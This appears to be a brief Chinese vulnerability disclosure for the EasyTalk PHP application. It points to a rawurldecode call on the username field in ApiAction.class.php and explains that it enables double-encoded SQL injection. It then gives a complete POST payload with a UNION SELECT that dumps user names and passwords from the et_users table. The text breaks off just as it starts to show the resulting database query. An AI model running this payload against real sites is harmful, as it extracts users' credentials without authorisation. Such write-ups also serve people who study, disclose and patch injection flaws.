漏洞位于/Home/Lib/Action/ApiAction.class.php的
其中这句代码
$username=trim(rawurldecode($this->_post('username')));
使用了rawurldecode导致二次注入
url为:
http://192.168.116.129/easytalk/?m=api&a=userpreview
POST数据为:
username=my5t3ry%2527/**/union select 1,2,concat(user_name,0x7c,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1/**/from/**/et_users%23
最终带入数据库查询语句为: